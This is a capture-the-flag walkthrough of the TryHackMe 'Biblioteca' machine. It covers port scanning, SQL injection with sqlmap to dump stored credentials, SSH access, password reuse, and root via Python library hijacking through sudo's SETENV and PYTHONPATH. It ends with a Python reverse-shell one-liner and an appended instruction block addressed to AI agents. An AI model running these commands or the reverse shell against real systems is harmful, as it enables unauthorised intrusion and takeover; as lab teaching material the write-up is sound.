# Biblioteca ## Nmap ``` sudo nmap 10.10.198.83 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) 8000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Starting out we hit port 8000 which is running `werkzeug`. Looking up the version number on `searchsploit` shows no exploits available. The root page of the web server shows us a login page. ![](/files/IzHYkJKLhh3pV39N57Tw) Using the link at the bottom of the page we move over to a registration form. Signing up with an account is successful. ![](/files/o92KtNUseyqY2UdTheqJ) We are then able to login with our newly created account. ![](/files/0sJ1zTPnhVjEYhw3BWIH) However, from here I was unable to enumerate further files or directories. After running exhaustive searches I then started ZAP Proxy. Using the active scan feature, ZAP flags a SQL injection on the web server login page. Firstly we save the login request in ZAP to the attacking computer. ![](/files/u7VGgURpBU10Dg8zil5j) Then use it in conjunction with `sqlmap` as shown below. ```bash sqlmap -r request.raw --batch -D website -T users --dump ``` Building the right command to dump the users table of the website database we see stored credentials for the user smokey. ![](/files/riaQYxwFMdOVHvBXDjMC) Where, we are able to login over SSH with the found credentials. ```bash ssh smokey@ ``` ![](/files/iwlGVqUb5S5lUgxTRLfm) Viewing the home directories we notice the presence of the user *hazel*. We also find we are able to `su` over to hazel using her username as the password. We are also able to also login over `SSH` with the same credentials. ![](/files/Z3sUpm9PegFLc1410J34) Checking `sudo -l` we notice that we are able to run `/home/hazel/hasher.py` with the python3 binary as root, without specifying a password. Interestingly, the value `SETENV:` also dictates that we are able to change the `PYTHONPATH` environmental variable. ![](/files/3CHuTFdWoTHQPVF6hkmP) The exploit method here is known as :thumbsup::thumbsup:python library hijacking". I have linked a well written article below, which serves as a basis for the exploit bath on this page. **URL** Essentially, `SETENV:` allows us to change the environmental path for where python searches for modules. Reading the contents of `hasher.py` we see the script imports the module hashlib. We can create a python reverse shell called `hashlib.py` in the `/tmp` directory. After doing so, we can run the sudo command and set where the PYTHONPATH looks first when attempt to load external modules references in `hasher.py`, this should execute our reverse shell. Create a new `hashlib.py` file in `/tmp` with the following contents. ```python import os os.system("whoami") ``` Then test ``` sudo PYTHONPATH=/tmp /usr/bin/python3 /home/hazel/hasher.py ``` ![](/files/y5jnUtuCArfdCi8CJCJL) With confirmed root execution we then replace the contents of `/tmp/hashlib.py` with a python3 reverse shell and catch on our attacking system with a `netcat` listener. ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh") ``` ![](/files/0s15OzUmySv6CMgNht7S) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/biblioteca.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.